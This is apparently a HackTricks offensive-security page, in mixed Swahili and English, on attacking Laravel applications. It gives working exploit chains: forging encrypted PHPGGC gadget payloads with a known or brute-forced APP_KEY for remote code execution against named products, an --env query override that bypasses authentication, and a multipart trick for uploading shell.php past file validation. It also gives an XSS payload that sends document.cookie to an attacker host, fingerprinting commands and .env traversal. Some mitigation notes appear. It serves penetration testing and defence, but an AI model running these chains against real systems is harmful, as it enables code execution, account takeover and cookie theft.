Laravel

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Laravel SQLInjection

Soma habari kuhusu hili hapa: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY & Usimbaji: mambo ya ndani (Laravel >=5.6)

Laravel inatumia AES-256-CBC (au GCM) pamoja na uadilifu wa HMAC katika ngazi ya ndani (Illuminate\Encryption\Encrypter). The raw ciphertext that is finally sent to the client is Base64 of a JSON object like:

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) ita serialize() maandishi wazi kwa chaguo-msingi, wakati decrypt($payload, $unserialize=true) itafanya unserialize() kiotomatiki thamani iliyofichuliwa. Kwa hivyo mshambuliaji yeyote anayejua siri ya 32-byte APP_KEY anaweza kuunda object ya PHP iliyoseriwalwa na iliyofichwa na kupata RCE kupitia magic methods (__wakeup, __destruct, …).

Minimal PoC (framework ≥9.x):

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

Ingiza string iliyotengenezwa katika sink yoyote dhaifu ya decrypt() (route param, cookie, session, …).

laravel-crypto-killer 🧨

laravel-crypto-killer inaotomatisha mchakato mzima na kuongeza hali ya bruteforce inayofaa:

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

Skripti inaunga mkono kwa uwazi payloads za CBC na GCM na inaunda tena uwanja wa HMAC/tag.

Mifano ya udhaifu ya ulimwengu halisi

Mtiririko wa exploitation daima ni:

1. Pata au fanya brute-force kwa APP_KEY ya 32-byte.
2. Jenga gadget chain kwa kutumia PHPGGC (kwa mfano Laravel/RCE13, Laravel/RCE9 au Laravel/RCE15).
3. Fanya encryption ya gadget iliyoserializwa kwa laravel_crypto_killer.py na APP_KEY uliopata.
4. Wasilisha ciphertext kwa sink ya decrypt() yenye udhaifu (route parameter, cookie, session …) ili kusababisha RCE.

Hapa chini kuna mistari mifupi (one-liners) inayoonyesha njia kamili ya shambulio kwa kila CVE ya dunia halisi iliyotajwa hapo juu:

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

Ugundaji wa APP_KEY kwa wingi kupitia cookie brute-force

Kwa sababu kila response mpya ya Laravel inaweka angalau cookie iliyofichwa (XSRF-TOKEN na kawaida laravel_session), vichunguzi vya umma vya intaneti (Shodan, Censys, …) leak mamilioni ya ciphertexts ambazo zinaweza kushambuliwa offline.

Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):

• Seti ya data Julai 2024 » 580 k tokeni, 3.99 % ya vifunguo vilivyovunjwa (≈23 k)
• Seti ya data Mei 2025 » 625 k tokeni, 3.56 % ya vifunguo vilivyovunjwa

• 1 000 serveri bado wameathirika na CVE-2018-15133 ya legacy kwa sababu tokeni zina moja kwa moja data iliyoserialishwa.

• Matumizi makubwa ya tena ya vifunguo – Top-10 APP_KEYs zimewekwa hard-coded kama defaults zinazotolewa na templates za Laravel za kibiashara (UltimatePOS, Invoice Ninja, XPanel, …).

Chombo binafsi cha Go nounours kinapanua AES-CBC/GCM bruteforce throughput hadi ~1.5 billion jaribu/s, ikipunguza kuvunja seti yote ya data hadi <2 dakika.

CVE-2024-52301 – HTTP argv/env override → auth bypass

Wakati PHP ina register_argc_argv=On (kawaida kwenye distros nyingi), PHP inaonyesha array argv kwa HTTP requests inayotokana na query string. Toleo za hivi karibuni za Laravel zilichambua hoja hizi “CLI-like” na zilikubali --env=<value> wakati wa runtime. Hii inawezesha kubadilisha environment ya framework kwa request ya sasa ya HTTP kwa kuongeza tu kwenye URL yoyote:

• Quick check:

• Tembelea https://target/?--env=local au mnyororo wowote na tazama mabadiliko yanayotegemea environment (debug banners, footers, verbose errors). Ikiwa mnyororo unaonekana reflected, override inafanya kazi.

• Impact example (business logic trusting a special env):

• Ikiwa app ina matawi kama if (app()->environment('preprod')) { /* bypass auth */ }, unaweza authenticate bila creds halali kwa kutuma POST ya login kwa:

• POST /login?--env=preprod

• Notes:

• Inafanya kazi kwa kila request, hakuna persistence.

• Inahitaji register_argc_argv=On na toleo la Laravel lililo hatarini linalosoma argv kwa HTTP.

• Primitive inayofaa kuleta verbose errors zaidi katika env za “debug” au kuamsha code paths zinazozuiliwa na environment.

• Mitigations:

• Zima register_argc_argv kwa PHP-FPM/Apache.

• Update Laravel ili isijali argv kwa HTTP requests na ondoa chochote cha assumptions za kuamini zinazoambatana na app()->environment() katika routes za production.

Minimal exploitation flow (Burp):

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

CVE-2025-27515 – Kupitisha uhalalishaji wa faili wa wildcard (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 na 12.0.0–12.1.0 zinaweza kuruhusu multipart requests zilizobuniwa kuepuka kabisa sheria yoyote iliyounganishwa na files.* / images.*. Parser inayopanua wildcard keys inaweza kuchanganyikiwa na placeholders zinazodhibitiwa na mshambuliaji (kwa mfano, pre-populating __asterisk__ segments), hivyo framework itahydrate UploadedFile objects bila kamwe kuendesha image, mimes, dimensions, max, n.k. Mara tu blob yenye nia mbaya inapofika ndani ya Storage::putFile* unaweza kupinduka kuelekea yoyote ya primitives za file-upload zilizotajwa tayari kwenye HackTricks (web shells, log poisoning, signed job deserialization, …).

Kutafuta muundo

• Statiki: rg -n "files\\.\*" -g"*.php" app/ au angalia FormRequest classes kwa rules() zinazorejesha arrays zinazoonyesha files.*.
• Dinamik: hook Illuminate\Validation\Validator::validate() kupitia Xdebug au Laravel Telescope katika pre-production ili kurekodi kila request inayoathiri rule inayovuja.
• Mapitio ya middleware/route: endpoints zinazokusanya mafaili mengi (kuingiza avatar, milango ya nyaraka, vipengele vya drag-n-drop) mara nyingi huamini files.*.

Mtiririko wa matumizi ya vitendo

1. Rekodi upload halali na uichezee tena (replay) katika Burp Repeater.
2. Nakili sehemu hiyo hiyo lakini badilisha jina la field ili tayari lijumuishe tokens za placeholder (mfano, files[0][__asterisk__payload]) au weka array nyingine ndani (files[0][alt][0]). Katika builds zilizo hatarini, sehemu ya pili haijahakikiwa kamwe lakini bado inakuwa entry ya UploadedFile.
3. Elekeza faili iliyofungiwa kwa payload ya PHP (shell.php, .phar, polyglot) na lazimisha application kuihifadhi katika disk inayoonekana kwenye wavuti (kwa kawaida public/ mara php artisan storage:link itawezeshwa).

curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'

Endelea fuzzing key names (files.__dot__0, files[0][0], files[0][uuid] …) hadi upate moja inayovuka validator lakini bado inaandikwa kwenye diski; patched versions zinakataa hizi crafted attribute names mara moja.

Vulns za ekosistimu zinazostahili kuunganishwa (2025)

CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

Ikiwa project inatumia login ya Auth0 na backend ya default CookieStore na auth0/auth0-php < 8.14.0, GCM tag kwenye auth0 session cookie ni fupi vya kutosha kwa brute-force offline. Capture cookie, badilisha JSON payload (kwa mfano, set "sub":"auth0|admin" na app_metadata.roles), brute-force tag, kisha replay ili kupata session halali ya Laravel guard. Ukaguzi wa haraka: composer.lock inaonyesha auth0/auth0-php <8.14.0 na .env ina AUTH0_SESSION_STORAGE=cookie.

CVE-2025-48490 – lomkit/laravel-rest-api validation override

Package ya lomkit/laravel-rest-api kabla ya 2.13.0 inaunganisha per-action rules vibaya: definitions za baadaye zinabwaga zile za awali kwa attribute ile ile, kuruhusu fields zilizotengenezwa kupita validation (kwa mfano, kubandika tena rules za filter wakati wa action ya update), na kusababisha mass assignment au filters zisizo validated zinazofanana na SQL. Ukaguzi wa vitendo:

• composer.lock inaorodhesha lomkit/laravel-rest-api <2.13.0.
• /_rest/users?filters[0][column]=password&filters[0][operator]== inakubaliwa badala ya kukataliwa, ikionyesha validation ya filter ilivunjwa.

Mbinu za Laravel

Hali ya debugging

Ikiwa Laravel iko katika debugging mode utaweza kupata code na data nyeti.
Kwa mfano http://127.0.0.1:8000/profiles:

Hili kwa kawaida linahitajika kwa ku-exploit CVE nyingine za Laravel RCE.

CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

• Affected: Laravel 11.9.0–11.35.1 na APP_DEBUG=true (kwa ujumla au imefforced kupitia misconfigured env overrides kama CVE-2024-52301).
• Primitive: kila exception isiyoshikiliwa inayotengenezwa na Whoops inarudisha sehemu za request/route bila ku-encode kwa HTML, hivyo kuingiza <img src> / <script> kwenye route au parameter ya request husababisha stored-on-response XSS kabla ya authentication.
• Impact: kuiba XSRF-TOKEN, leak stack traces with secrets, kufungua pivot kupitia browser kugonga _ignition/execute-solution katika sessions za waathiriwa, au ku-chain na passwordless dashboards zinazotegemea cookies.

Minimal PoC:

// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});

curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"

Hata kama debug mode kwa kawaida imezimwa, kulazimisha error kupitia background jobs au queue workers na kuchunguza endpoint _ignition/health-check mara nyingi hufichua staging hosts ambazo bado zinaonyesha mnyororo huu.

Fingerprinting & exposed dev endpoints

Quick checks to identify a Laravel stack and dangerous dev tooling exposed in production:

• /_ignition/health-check → Ignition ipo (debug tool used by CVE-2021-3129). Ikiwa inafikiwa bila authentication, app inaweza kuwa katika debug au misconfigured.
• /_debugbar → Laravel Debugbar assets; mara nyingi inaonyesha debug mode.
• /telescope → Laravel Telescope (dev monitor). Ikiwa public, tarajia broad information disclosure na possible actions.
• /horizon → Queue dashboard; version disclosure na wakati mwingine CSRF-protected actions.
• X-Powered-By, cookies XSRF-TOKEN na laravel_session, na Blade error pages pia husaidia fingerprint.

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Laravel inahifadhi APP inayotumika encrypt cookies na sifa nyingine za kuingia ndani ya faili iitwayo .env ambayo inaweza kupatikana kwa kutumia path traversal chini ya: /../.env

Laravel pia itaonyesha taarifa hizi kwenye ukurasa wa debug (unaoonekana wakati Laravel inapogundua kosa na debug imewezeshwa).

Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:

Decrypt Cookie

</details>

### Laravel Deserialization RCE

Toleo zilizoathiriwa: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Hapa unaweza kupata taarifa kuhusu deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

Unaweza kujaribu na kui-exploit kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kui-exploit kwa metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## Marejeo
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)


> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>